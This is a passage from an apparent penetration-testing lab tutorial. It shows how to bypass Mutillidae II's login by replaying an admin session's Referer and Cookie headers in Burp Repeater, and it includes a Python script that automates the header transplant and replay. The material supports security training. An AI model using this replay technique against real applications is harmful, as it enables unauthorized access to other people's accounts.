How to do it...

  1. Open the Firefox browser to the home page of OWASP Mutillidae II, using the Home button from the top menu on the left-hand side. Make sure you are not logged into the application. If you are logged in, select Logout from the menu:

  2. In Burp, go to the Proxy | HTTP history tab and select the request you just made while browsing to the home page unauthenticated. Right-click, and then select Send to Repeater:

  3. Using this same request and location, right-click again, and then select Send to Comparer (request):

  4. Return to the home page in your browser and click the Login/Register button. At the login page, log in with the username admin and the password admin. Click Login.
  5. After you log in, log out again. Make sure you press the Logout button and are actually logged out of the admin account.
  6. In Burp, go to the Proxy | HTTP history tab and find the requests you just made while logging in as admin. Select the GET request immediately following the POST that received the 302 redirect. Right-click, and then select Send to Repeater (request):

  7. Using this same request and location, right-click again, and then select Send to Comparer (request):

  8. Go to Burp's Comparer tab. Notice that the two requests you sent are highlighted. Press the Words button on the bottom right-hand side to compare the two requests:

  9. A dialog pop-up displays the two requests with color-coded highlights that draw your eye to the differences. Note the change in the Referer header and the additional name/value pairs placed in the Cookie header after logging in as admin. Close the pop-up with the X on the right-hand side:

  10. Return to the Repeater tab containing the first GET request, the one you performed unauthenticated. Before performing this attack, make sure you are completely logged out of the application.
  11. You can verify that you are logged out by clicking the Go button in the Repeater tab holding your unauthenticated request; the rendered response should not show you as logged in:

  12. Now flip over to the Repeater tab containing your second GET request, the one made as the authenticated user admin. Highlight the Referer and Cookie headers of that request, right-click, and select Copy. This attack is parameter modification: the identity-carrying headers of an authenticated session are replayed so that the login page is never passed through:

  13. Return to the Repeater | Raw tab of the first (unauthenticated) GET request. Highlight its own Referer and Cookie headers, right-click, and select Paste so that they are replaced by the values copied from the authenticated request. Leave the request line untouched; the point is that the unauthenticated request, not the authenticated one, is what gets sent.
  14. Click the Go button to send your modified GET request. Remember, this is the first GET request, the one you performed unauthenticated.
  15. Verify in the Response | Render tab that you are now shown as logged in as admin. We were able to bypass the authentication mechanism (that is, the login page) by performing parameter manipulation:

Two caveats belong in the write-up of this finding. If the copied session cookie is still honoured after an explicit logout, the server did not invalidate the session on logout (insufficient session expiration). If instead the extra cookie name/value pairs added at login are what make the page render as admin, the application is trusting client-supplied identity values. To tell the two apart, repeat the replay once with only the original session cookie and once with only the additional pairs, and compare the rendered responses.
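The following Python script reproduces the Comparer and Repeater steps of this recipe programmatically, so the check can be re-run without clicking through Burp: it diffs the two captured requests, lists the cookie pairs that appeared only after login, rebuilds the unauthenticated request with the Referer and Cookie headers transplanted from the authenticated one, and can send the result to a running lab. This is an added example, not code from the Burp Suite Cookbook or from OWASP Mutillidae II. The two raw requests are constructed samples; the host, paths, session IDs, the cookie names username and uid, and the "Logout" marker used to detect a logged-in page are assumptions, not captures from a real instance.

```python
"""Replay an unauthenticated request with headers taken from an authenticated one.

Added example mirroring the Comparer/Repeater steps; not from the Burp Suite
Cookbook or Mutillidae. Requests, host, session IDs and cookie names are
constructed assumptions.
"""

import http.client
import sys
from typing import Dict, List, Optional, Tuple

# Constructed sample: the GET to the home page made while logged out.
UNAUTH_REQUEST = (
    "GET /mutillidae/index.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://127.0.0.1/mutillidae/index.php\r\n"
    "Cookie: PHPSESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed sample: the GET that followed the login POST's 302 as admin.
# The username/uid pairs are an assumption about what the app adds at login.
AUTH_REQUEST = (
    "GET /mutillidae/index.php?page=home.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://127.0.0.1/mutillidae/index.php?page=login.php\r\n"
    "Cookie: PHPSESSID=bbbbbbbbbbbbbbbbbbbbbbbbbb; username=admin; uid=1\r\n"
    "Connection: close\r\n"
    "\r\n"
)

Header = Tuple[str, str]


def parse_request(raw: str) -> Tuple[str, List[Header]]:
    """Split a raw HTTP/1.1 request into its request line and ordered headers.
    Name casing and order are kept so the rebuilt request looks browser-sent;
    the body is ignored (the recipe only replays GETs)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers: List[Header] = []
    for line in lines[1:]:
        if line.strip():
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def header_map(headers: List[Header]) -> Dict[str, str]:
    """Case-insensitive lookup (HTTP header names are case-insensitive)."""
    return {name.lower(): value for name, value in headers}


def diff_headers(a_raw: str, b_raw: str) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """What Comparer highlights: headers whose value differs, as (a, b); None = absent."""
    a = header_map(parse_request(a_raw)[1])
    b = header_map(parse_request(b_raw)[1])
    return {n: (a.get(n), b.get(n)) for n in sorted(set(a) | set(b)) if a.get(n) != b.get(n)}


def cookie_pairs(cookie_value: str) -> Dict[str, str]:
    """Parse 'k=v; k2=v2' into a dict; a bare token maps to an empty string."""
    pairs: Dict[str, str] = {}
    for part in cookie_value.split(";"):
        if part.strip():
            name, _, value = part.strip().partition("=")
            pairs[name.strip()] = value.strip()
    return pairs


def new_cookie_pairs(unauth_raw: str, auth_raw: str) -> Dict[str, str]:
    """The additional name/value pairs the app set in the cookie at login."""
    before = cookie_pairs(header_map(parse_request(unauth_raw)[1]).get("cookie", ""))
    after = cookie_pairs(header_map(parse_request(auth_raw)[1]).get("cookie", ""))
    return {k: v for k, v in after.items() if k not in before}


def transplant_headers(unauth_raw: str, auth_raw: str,
                       names: Tuple[str, ...] = ("Referer", "Cookie")) -> str:
    """Rebuild the unauthenticated request with the named headers replaced by the
    authenticated values. The request line is kept: what goes out is still the
    first (unauthenticated) GET, exactly as in the Repeater step."""
    request_line, unauth_headers = parse_request(unauth_raw)
    _, auth_headers = parse_request(auth_raw)
    wanted = {n.lower() for n in names}
    donor = {n.lower(): (n, v) for n, v in auth_headers if n.lower() in wanted}
    rebuilt = [donor.get(n.lower(), (n, v)) for n, v in unauth_headers]
    present = {n.lower() for n, _ in rebuilt}
    rebuilt += [h for k, h in donor.items() if k not in present]  # sent only when logged in
    return request_line + "\r\n" + "\r\n".join(f"{n}: {v}" for n, v in rebuilt) + "\r\n\r\n"


def appears_logged_in_as(body: str, user: str) -> bool:
    """Assumption: a logged-in page shows a Logout link and the username."""
    return "Logout" in body and user in body


def send_raw(raw: str, host: str, port: int = 80) -> Tuple[int, str]:
    """The Go button: send the rebuilt request to a running lab (not run offline)."""
    request_line, headers = parse_request(raw)
    method, path, _ = request_line.split(" ", 2)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path, headers=dict(headers))  # Host taken from headers
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, body


if __name__ == "__main__":
    print("differing headers:", diff_headers(UNAUTH_REQUEST, AUTH_REQUEST))
    print("pairs added at login:", new_cookie_pairs(UNAUTH_REQUEST, AUTH_REQUEST))
    replay = transplant_headers(UNAUTH_REQUEST, AUTH_REQUEST)
    print(replay)
    if len(sys.argv) > 1:  # python replay.py <lab-host> sends it for real
        status, body = send_raw(replay, sys.argv[1])
        print(status, "logged in as admin:", appears_logged_in_as(body, "admin"))
```

Run it with no arguments to see the diff and the rebuilt request offline; pass the lab host to actually replay it. To separate session reuse from trust in the extra cookie pairs, call `transplant_headers` with `names=("Cookie",)` after editing `AUTH_REQUEST` to carry only the session ID, then only the added pairs, and compare what `appears_logged_in_as` reports for each.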
